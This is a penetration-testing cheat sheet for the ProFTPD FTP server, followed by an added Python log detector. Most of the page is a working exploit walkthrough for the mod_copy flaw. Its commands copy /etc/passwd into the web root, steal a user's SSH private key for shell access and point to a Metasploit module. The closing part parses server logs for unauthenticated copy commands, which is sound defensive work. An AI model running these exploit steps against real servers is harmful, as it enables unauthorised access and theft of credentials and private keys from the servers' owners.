ProFTPD

What it is: Popular open-source FTP server for Unix/Linux. The mod_copy module (enabled by default) allows unauthenticated file copying on the server, which is a common exploit path.

Default ports: 21

Check ProFTPD version

Banner grab reveals version — Determines exploit path

nc -nv $IP 21
nmap -sV -p 21 $IP

Example output:
220 ProFTPD 1.3.5 Server ready.

ProFTPD mod_copy (CVE-2015-3306)

Copy files on the server without authentication — ProFTPD 1.3.5

nc $IP 21
SITE CPFR /etc/passwd
350 File or directory exists, ready for destination name
SITE CPTO /var/www/html/passwd.txt
250 Copy successful
curl http://$IP/passwd.txt

Copy SSH key for access

Use mod_copy to steal or plant SSH keys — Instant shell access

nc $IP 21
SITE CPFR /home/user/.ssh/id_rsa
SITE CPTO /var/www/html/id_rsa
curl http://$IP/id_rsa -o id_rsa
chmod 600 id_rsa
ssh -i id_rsa user@$IP

ProFTPD RCE (CVE-2019-12815)

mod_copy in ProFTPD up to 1.3.5b — Arbitrary file copy

searchsploit proftpd
# Use exploit/unix/ftp/proftpd_modcopy_exec in Metasploit
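
Detection: the SITE CPFR / SITE CPTO exchanges in the mod_copy sections above leave a recognisable trace in the server's command log. The following is an added example, not part of the original page or of ProFTPD: it pairs the two commands per client and flags those issued with no logged-in user. The log layout, the sample lines and the web-root prefix are assumptions, marked in the comments.

```python
import re

# Assumption: ExtendedLog is written with ProFTPD's default LogFormat
#   %h %l %u %t "%r" %s %b   (host ident user [time] "command" reply bytes)
LINE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<cmd>[^"]*)" (?P<code>\d{3}|-) \S+$'
)
COPY = re.compile(r'^SITE\s+(CPFR|CPTO)\s+(.+)$', re.IGNORECASE)
WEB_ROOTS = ('/var/www/',)  # assumption: the web root used in this page's examples

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '198.51.100.23 UNKNOWN - [12/Mar/2024:10:15:02 +0000] "SITE CPFR /etc/passwd" 350 -',
    '198.51.100.23 UNKNOWN - [12/Mar/2024:10:15:03 +0000] "SITE CPTO /var/www/html/passwd.txt" 250 -',
    '192.0.2.10 UNKNOWN alice [12/Mar/2024:10:20:11 +0000] "SITE CPFR /home/alice/a.txt" 350 -',
    '192.0.2.10 UNKNOWN alice [12/Mar/2024:10:20:12 +0000] "SITE CPTO /home/alice/b.txt" 250 -',
    '203.0.113.5 UNKNOWN - [12/Mar/2024:10:31:40 +0000] "SITE CPFR /etc/shadow" 530 -',
    '203.0.113.5 UNKNOWN - [12/Mar/2024:10:31:41 +0000] "SITE CPTO /tmp/x" 530 -',
]

def find_unauth_copies(lines):
    """Return one finding per SITE CPTO sent while no user was logged in ('-')."""
    pending = {}   # client host -> source path of its last accepted CPFR
    findings = []
    for raw in lines:
        m = LINE.match(raw.strip())
        if not m:
            continue  # not in the assumed format
        c = COPY.match(m['cmd'])
        if not c or m['user'] != '-':
            continue  # ignore other commands and authenticated sessions
        verb, path = c.group(1).upper(), c.group(2).strip()
        if verb == 'CPFR':
            if m['code'] == '350':  # server accepted the source path
                pending[m['host']] = path
            continue
        findings.append({
            'host': m['host'], 'time': m['time'],
            'src': pending.pop(m['host'], None), 'dst': path,
            'copied': m['code'] == '250',          # 250 = copy completed
            'web_exposed': path.startswith(WEB_ROOTS),
        })
    return findings

if __name__ == '__main__':
    for finding in find_unauth_copies(SAMPLE_LOG):
        print(finding)
```

A finding with copied set to True means a file was duplicated before any login. Upgrading ProFTPD or unloading mod_copy removes the exposure, and the check covers hosts where neither has been done yet.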